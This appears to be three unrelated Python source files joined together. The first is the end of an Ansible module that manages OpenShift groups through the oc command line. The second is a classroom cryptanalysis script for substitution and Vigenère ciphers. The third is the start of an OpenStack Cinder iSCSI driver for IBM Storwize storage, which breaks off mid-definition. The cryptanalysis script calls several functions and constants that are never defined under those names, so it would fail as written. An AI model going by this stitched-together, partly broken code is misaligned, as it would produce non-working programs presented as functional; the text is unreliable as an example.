return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, name=None, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
else:
raise OpenShiftCLIError('Either name or selector is required when calling delete.')
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, name=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
cmd.append('--schedulable={}'.format(schedulable))
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
if grace_period:
cmd.append('--grace-period={}'.format(int(grace_period)))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']: # E501
cmds.extend(['-n', self.namespace])
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"cmd": ' '.join(cmds)}
if output_type == 'json':
rval['results'] = {}
if output and stdout:
try:
rval['results'] = json.loads(stdout)
except ValueError as verr:
if "No JSON object could be decoded" in verr.args:
rval['err'] = verr.args
elif output_type == 'raw':
rval['results'] = stdout if output else ''
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if 'err' in rval or returncode != 0:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class Utils(object): # pragma: no cover
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(contents)
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
# By default "oc version in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
# "v3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = version[1:4]
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import rpm
transaction_set = rpm.TransactionSet()
rpmquery = transaction_set.dbMatch("name", "atomic-openshift")
return rpmquery.count() > 0
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self, ascommalist=''):
'''return all options as a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs'''
return self.stringify(ascommalist)
def stringify(self, ascommalist=''):
''' return the options hash as cli params in a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs '''
rval = []
for key in sorted(self.config_options.keys()):
data = self.config_options[key]
if data['include'] \
and (data['value'] or isinstance(data['value'], int)):
if key == ascommalist:
val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
else:
val = data['value']
rval.append('--{}={}'.format(key.replace('_', '-'), val))
return rval
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/group.py -*- -*- -*-
class GroupConfig(object):
''' Handle route options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
namespace,
kubeconfig):
''' constructor for handling group options '''
self.kubeconfig = kubeconfig
self.name = sname
self.namespace = namespace
self.data = {}
self.create_dict()
def create_dict(self):
''' return a service as a dict '''
self.data['apiVersion'] = 'v1'
self.data['kind'] = 'Group'
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
self.data['users'] = None
# pylint: disable=too-many-instance-attributes
class Group(Yedit):
''' Class to wrap the oc command line tools '''
kind = 'group'
def __init__(self, content):
'''Group constructor'''
super(Group, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_group.py -*- -*- -*-
class OCGroup(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
kind = 'group'
def __init__(self,
config,
verbose=False):
''' Constructor for OCGroup '''
super(OCGroup, self).__init__(config.namespace, config.kubeconfig)
self.config = config
self.namespace = config.namespace
self._group = None
@property
def group(self):
''' property function service'''
if not self._group:
self.get()
return self._group
@group.setter
def group(self, data):
''' setter function for yedit var '''
self._group = data
def exists(self):
''' return whether a group exists '''
if self.group:
return True
return False
def get(self):
'''return group information '''
result = self._get(self.kind, self.config.name)
if result['returncode'] == 0:
self.group = Group(content=result['results'][0])
elif 'groups \"{}\" not found'.format(self.config.name) in result['stderr']:
result['returncode'] = 0
result['results'] = [{}]
return result
def delete(self):
'''delete the object'''
return self._delete(self.kind, self.config.name)
def create(self):
'''create the object'''
return self._create_from_content(self.config.name, self.config.data)
def update(self):
'''update the object'''
return self._replace_content(self.kind, self.config.name, self.config.data)
def needs_update(self):
''' verify an update is needed '''
return not Utils.check_def_equal(self.config.data, self.group.yaml_dict, skip_keys=[], debug=True)
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params, check_mode=False):
'''run the idempotent ansible code'''
gconfig = GroupConfig(params['name'],
params['namespace'],
params['kubeconfig'],
)
oc_group = OCGroup(gconfig, verbose=params['debug'])
state = params['state']
api_rval = oc_group.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
#####
# Get
#####
if state == 'list':
return {'changed': False, 'results': api_rval['results'], 'state': state}
########
# Delete
########
if state == 'absent':
if oc_group.exists():
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete.'}
api_rval = oc_group.delete()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
return {'changed': False, 'state': state}
if state == 'present':
########
# Create
########
if not oc_group.exists():
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create.'}
# Create it here
api_rval = oc_group.create()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_group.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
########
# Update
########
if oc_group.needs_update():
api_rval = oc_group.update()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_group.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
return {'changed': False, 'results': api_rval, 'state': state}
return {'failed': True, 'msg': 'Unknown state passed. {}'.format(state)}
# -*- -*- -*- End included fragment: class/oc_group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_group.py -*- -*- -*-
#pylint: disable=too-many-branches
def main():
'''
ansible oc module for group
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str',
choices=['present', 'absent', 'list']),
debug=dict(default=False, type='bool'),
name=dict(default=None, type='str'),
namespace=dict(default='default', type='str'),
# addind users to a group is handled through the oc_users module
#users=dict(default=None, type='list'),
),
supports_check_mode=True,
)
rval = OCGroup.run_ansible(module.params, module.check_mode)
if 'failed' in rval:
return module.fail_json(**rval)
return module.exit_json(**rval)
if __name__ == '__main__':
main()
# -*- -*- -*- End included fragment: ansible/oc_group.py -*- -*- -*-
|
|
#! usr/bin/env python3
"""
I intend this to be a crytanalysis suite that can analyze an arbitrary
ciphertext and provide details on what the encryption method might be,
what the key might look like, and/or a potential cipher text solution.
"""
ORIGINAL_CIPHERTEXT = "\
NAGQNXIIZAGBGIIYXQOMQUGQUZAXTNGMYXQGTTASNISQO\
AMFGZAGEZVOOGUZAGIGMTAMQUTZYMXQGUMCMYZDECMLWS\
RVQYVIEASVQUTXLMQQSZTZMYZZAGDMOMXQSQMPVMYYESR\
WQSNIGUOGZAGEAMZGZSAVQZXLMQAMVIZAGDMQUVYOGZAG\
DQSDSYGQSDSYGLMQXGQUVYGZSBGMYZAGBYVQZSRZAGBSS\
WTZAMZIXGSVZSQZAGUGTWTMRVIIZAYGGTLSYGSRTGFGYM\
IXQTVIZTSRBISZZGUCMOGTMQUTLYMNISRTISFGQIENSYW\
ZAMZZAGEAMFGSRRGYGUDGXMDTXLWMQUZXYGUDSYGZAMQM\
QEZAYMIIVCSQZAGNSSUTZMLWTNSYWXQONGMYXGUIE"
# Letter frequencies taken from Table 1.1 from Understanding Crypto, page 9
ENGLISH_LETTER_FREQUENCY = {
'A' : .0817,
'B' : .0150,
'C' : .0278,
'D' : .0425,
'E' : .1270,
'F' : .0223,
'G' : .0202,
'H' : .0609,
'I' : .0697,
'J' : .0015,
'K' : .0077,
'L' : .0403,
'M' : .0241,
'N' : .0675,
'O' : .0751,
'P' : .0193,
'Q' : .0010,
'R' : .0599,
'S' : .0633,
'T' : .0906,
'U' : .0276,
'V' : .0098,
'W' : .0236,
'X' : .0015,
'Y' : .0197,
'Z' : .0007
}
substitution_dict = {
'A' : '_',
'B' : '_',
'C' : '_',
'D' : '_',
'E' : '_',
'F' : '_',
'G' : '_',
'H' : '_',
'I' : '_',
'J' : '_',
'K' : '_',
'L' : '_',
'M' : '_',
'N' : '_',
'O' : '_',
'P' : '_',
'Q' : '_',
'R' : '_',
'S' : '_',
'T' : '_',
'U' : '_',
'V' : '_',
'W' : '_',
'X' : '_',
'Y' : '_',
'Z' : '_'
}
def find_letter_distribution(ciphertext, percentage = False):
"""
Returns a dictionary containing letter frequencies of each
letter included in the string (Normalized if 'percentage',
absolute otherwise.)
"""
distribution = dict()
for character in ciphertext:
# Keep a running total in 'distribution' of character count
if character not in distribution:
distribution[character] = 1
else:
distribution[character] += 1
# Normalize the data if percentage is requested
if percentage:
for char in distribution:
distribution[char] /= len(ciphertext)
return distribution
# Print the highest frequency letters first
# for char in sorted(distribution, key=distribution.get, reverse=True):
# print(char,'has a frequency of',distribution[char])
def translate_from_dictionary(ciphertext, translate):
"""
Translate the ciphertext using the
'translate' dictionary as a substitution table.
"""
plaintext = ''
for character in ciphertext:
plaintext += translate[character]
return plaintext
def count_digraphs(ciphertext):
"""
Count and print the most frequent 2-letter
combinations in the ciphertext.
"""
# Zip the ciphertext with an offset to get 2char elements
two_letter_set = [x+y for x,y in zip(*[ciphertext[i:]
for i in range(2)])]
digraph_frequency = dict()
for digraph in two_letter_set:
if digraph not in digraph_frequency:
digraph_frequency[digraph] = 1
else:
digraph_frequency[digraph] += 1
print('2-letter sequences:')
for digraph in sorted(digraph_frequency,
key=digraph_frequency.get,
reverse=True):
if digraph_frequency[digraph] > 5:
print(digraph, digraph_frequency[digraph])
print()
def count_trigraphs(ciphertext):
"""
Count and print the most frequent
3-letter combinations in ciphertext.
"""
# Zip the ciphertext with an offset to get 3char elements
three_letter_set = [x+y+z for x,y,z in zip(*[ciphertext[i:]
for i in range(3)])]
trigraph_frequency = dict()
for trigraph in three_letter_set:
if trigraph not in trigraph_frequency:
trigraph_frequency[trigraph] = 1
else:
trigraph_frequency[trigraph] += 1
print('3 letter sequences:')
for trigraph in sorted(trigraph_frequency,
key=trigraph_frequency.get,
reverse=True):
if trigraph_frequency[trigraph] > 3:
print(trigraph, trigraph_frequency[trigraph])
print()
def vigenere_split_substrings(ciphertext, keylength):
""" Splits the ciphertext into 'keylength' substrings and offsets
them as described in Homework 2 problem 2 """
substring_list = [''] * keylength
substring_index = 0
offset = 0
# split the ciphertext into substrings
for letter in ciphertext:
# offset the letter by which key iteration it is on
new_letter_value = ord(letter) - offset
# Can't use modulo, so put it back in range 65-90
while new_letter_value < 65:
new_letter_value += 26
# add it to the list, continue
substring_list[substring_index] += chr(new_letter_value)
substring_index += 1
# If we've gone past the keylength, reset to 0 and increase offset
if substring_index == keylength:
substring_index = 0
offset += 1
return substring_list
def index_of_coincidence(ciphertext):
""" Calculates the index of coincidence of ciphertext, as
defined in the Vigenere slides """
distribution = letter_frequency(ciphertext)
top_sum = 0
# Sum up n(n-1) for each letter n
for letter in distribution:
top_sum += (distribution[letter] * (distribution[letter]-1))
denominator = (len(ciphertext)*(len(ciphertext)-1))
index_of_coincidence = top_sum / denominator
return index_of_coincidence
def test_key_lengths():
""" Find the average index of coincidence for various key lengths. """
for n in range(1,15):
n_substrings = split_substrings(CIPHERTEXT,n)
index_total = 0
for sub in n_substrings:
index_total += index_of_coincidence(sub)
avg_index = index_total / n
print('Key length:',n,'average index of coincidence:','%.4f' % avg_index)
# English cipher-text should have roughly .066 index of coincidence.
def test_g_value(ciphertext, g):
""" Tests the distribution index of coincidence with an offset of g.
High indices ~.066 indicate g is the offset value for the substring. """
distribution = letter_frequency(ciphertext)
index_total = 0
# For each letter, compare its' (decrypted) frequency in the cipher-text
# to the actual letter's English frequency
for letter_value in range(65,91):
letter = chr(letter_value)
new_letter_value = letter_value + g
if new_letter_value > 90:
new_letter_value -= 26
new_letter = chr(new_letter_value)
# Default to zero if letter isn't in distribution
cipher_frequency = distribution.get(new_letter,0)
english_frequency = ENGLISH_FREQUENCY[letter]
index_total += english_frequency * cipher_frequency / len(ciphertext)
return index_total
def compute_key(ciphertext, keylength):
""" Compute the index of coincidence for all possible offset values (g) and
print when one is close to an English distribution. """
substrings = split_substrings(CIPHERTEXT,keylength)
for sub in substrings:
print('Testing substring',sub)
for g in range(0,26):
tested_value = test_g_value(sub,g)
if tested_value > .05:
print('g value of',g,'(letter',chr(g+65)+') gives index of',tested_value)
def decrypt_ciphertext(ciphertext, key):
""" Decrypts ciphertext assuming a repeated 'key' as the keystring
where each iteration of 'key' is incremented modulo 26. """
index = 0
offset = 0
plaintext = ''
for letter in ciphertext:
letter_value = ord(letter)
# -65 to account for 'A' = 65, offset to account for repeated key
letter_value -= ord(key[index]) - 65 + offset
index += 1
if index == len(key):
index = 0
offset += 1
# Keep in range 65-90
while letter_value < 65:
letter_value += 26
plaintext += chr(letter_value)
return plaintext
def general_analysis(ciphertext):
"""
Prints general analysis of a ciphertext to the console.
Included are: length, unique letters, ...
"""
print('Total length of ciphertext:', len(ciphertext))
print('Unique letters:',len(find_letter_distribution(ciphertext)))
count_digraphs(ORIGINAL_CIPHERTEXT)
count_trigraphs(ORIGINAL_CIPHERTEXT)
print('Translation:\n', translate(ORIGINAL_CIPHERTEXT))
|
|
# Copyright 2015 IBM Corp.
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
ISCSI volume driver for IBM Storwize family and SVC storage systems.
Notes:
1. If you specify both a password and a key file, this driver will use the
key file only.
2. When using a key file for authentication, it is up to the user or
system administrator to store the private key in a safe manner.
3. The defaults for creating volumes are "-rsize 2% -autoexpand
-grainsize 256 -warning 0". These can be changed in the configuration
file or by using volume types(recommended only for advanced users).
Limitations:
1. The driver expects CLI output in English, error messages may be in a
localized format.
2. Clones and creating volumes from snapshots, where the source and target
are of different sizes, is not supported.
"""
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder import interface
from cinder import utils
from cinder.volume.drivers.ibm.storwize_svc import (
storwize_svc_common as storwize_common)
LOG = logging.getLogger(__name__)
storwize_svc_iscsi_opts = [
cfg.BoolOpt('storwize_svc_iscsi_chap_enabled',
default=True,
help='Configure CHAP authentication for iSCSI connections '
'(Default: Enabled)'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_iscsi_opts)
@interface.volumedriver
class StorwizeSVCISCSIDriver(storwize_common.StorwizeSVCCommonDriver):
"""IBM Storwize V7000 and SVC iSCSI volume driver.
Version history:
.. code-block:: none
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim
to lsfabric, clear unused data from connections, ensure
matching WWPNs by comparing lower case
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
1.2.6 - Added QoS support in terms of I/O throttling rate
1.3.1 - Added support for volume replication
1.3.2 - Added support for consistency group
1.3.3 - Update driver to use ABC metaclasses
2.0 - Code refactor, split init file and placed shared methods
for FC and iSCSI within the StorwizeSVCCommonDriver class
2.0.1 - Added support for multiple pools with model update
2.1 - Added replication V2 support to the global/metro mirror
mode
2.1.1 - Update replication to version 2.1
"""
VERSION = "2.1.1"
# ThirdPartySystems wiki page
CI_WIKI_NAME = "IBM_STORWIZE_CI"
def __init__(self, *args, **kwargs):
super(StorwizeSVCISCSIDriver, self).__init__(*args, **kwargs)
self.protocol = 'iSCSI'
self.configuration.append_config_values(
storwize_svc_iscsi_opts)
def validate_connector(self, connector):
"""Check connector for at least one enabled iSCSI protocol."""
if 'initiator' not in connector:
LOG.error(_LE('The connector does not contain the required '
'information.'))
raise exception.InvalidConnectorException(
missing='initiator')
def initialize_connection(self, volume, connector):
"""Perform necessary work to make an iSCSI connection."""
@utils.synchronized('storwize-host' + self._state['system_id'] +
connector['host'], external=True)
def _do_initialize_connection_locked():
return self._do_initialize_connection(volume, connector)
return _do_initialize_connection_locked()
def _do_initialize_connection(self, volume, connector):
"""Perform necessary work to make an iSCSI connection.
To be able to create an iSCSI connection from a given host to a
volume, we must:
1. Translate the given iSCSI name to a host name
2. Create new host on the storage system if it does not yet exist
3. Map the volume to the host if it is not already done
4. Return the connection information for relevant nodes (in the
proper I/O group)
"""
LOG.debug('enter: initialize_connection: volume %(vol)s with connector'
' %(conn)s', {'vol': volume['id'], 'conn': connector})
volume_name = volume['name']
# Check if a host object is defined for this host name
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
# Host does not exist - add a new host to Storwize/SVC
host_name = self._helpers.create_host(connector)
chap_secret = self._helpers.get_chap_secret_for_host(host_name)
chap_enabled = self.configuration.storwize_svc_iscsi_chap_enabled
if chap_enabled and chap_secret is None:
chap_secret = self._helpers.add_chap_secret_to_host(host_name)
elif not chap_enabled and chap_secret:
LOG.warning(_LW('CHAP secret exists for host but CHAP is '
'disabled.'))
volume_attributes = self._helpers.get_vdisk_attributes(volume_name)
if volume_attributes is None:
msg = (_('initialize_connection: Failed to get attributes'
' for volume %s.') % volume_name)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
multihostmap = self.configuration.storwize_svc_multihostmap_enabled
lun_id = self._helpers.map_vol_to_host(volume_name, host_name,
multihostmap)
try:
preferred_node = volume_attributes['preferred_node_id']
IO_group = volume_attributes['IO_group_id']
except KeyError as e:
LOG.error(_LE('Did not find expected column name in '
'lsvdisk: %s.'), e)
raise exception.VolumeBackendAPIException(
data=_('initialize_connection: Missing volume attribute for '
'volume %s.') % volume_name)
try:
# Get preferred node and other nodes in I/O group
preferred_node_entry = None
io_group_nodes = []
for node in self._state['storage_nodes'].values():
if self.protocol not in node['enabled_protocols']:
continue
if node['id'] == preferred_node:
preferred_node_entry = node
if node['IO_group'] == IO_group:
io_group_nodes.append(node)
if not len(io_group_nodes):
msg = (_('initialize_connection: No node found in '
'I/O group %(gid)s for volume %(vol)s.') %
{'gid': IO_group, 'vol': volume_name})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not preferred_node_entry:
# Get 1st node in I/O group
preferred_node_entry = io_group_nodes[0]
LOG.warning(_LW('initialize_connection: Did not find a '
'preferred node for volume %s.'), volume_name)
properties = {}
properties['target_discovered'] = False
properties['target_lun'] = lun_id
properties['volume_id'] = volume['id']
if len(preferred_node_entry['ipv4']):
ipaddr = preferred_node_entry['ipv4'][0]
else:
ipaddr = preferred_node_entry['ipv6'][0]
properties['target_portal'] = '%s:%s' % (ipaddr, '3260')
properties['target_iqn'] = preferred_node_entry['iscsi_name']
if chap_secret:
properties['auth_method'] = 'CHAP'
properties['auth_username'] = connector['initiator']
properties['auth_password'] = chap_secret
properties['discovery_auth_method'] = 'CHAP'
properties['discovery_auth_username'] = (
connector['initiator'])
properties['discovery_auth_password'] = chap_secret
except Exception:
with excutils.save_and_reraise_exception():
self._do_terminate_connection(volume, connector)
LOG.error(_LE('initialize_connection: Failed '
'to collect return '
'properties for volume %(vol)s and connector '
'%(conn)s.\n'), {'vol': volume,
'conn': connector})
LOG.debug('leave: initialize_connection:\n volume: %(vol)s\n '
'connector %(conn)s\n properties: %(prop)s',
{'vol': volume['id'], 'conn': connector,
'prop': properties})
return {'driver_volume_type': 'iscsi', 'data': properties, }
def terminate_connection(self, volume, connector, **kwargs):
"""Cleanup after an iSCSI connection has been terminated."""
# If a fake connector is generated by nova when the host
# is down, then the connector will not have a host property,
# In this case construct the lock without the host property
# so that all the fake connectors to an SVC are serialized
host = connector['host'] if 'host' in connector else ""
@utils.synchronized('storwize-host' + self._state['system_id'] + host,
external=True)
def _do_terminate_connection_locked():
return self._do_terminate_connection(volume, connector,
**kwargs)
return _do_terminate_connection_locked()
def _do_terminate_connection(self, volume, connector, **kwargs):
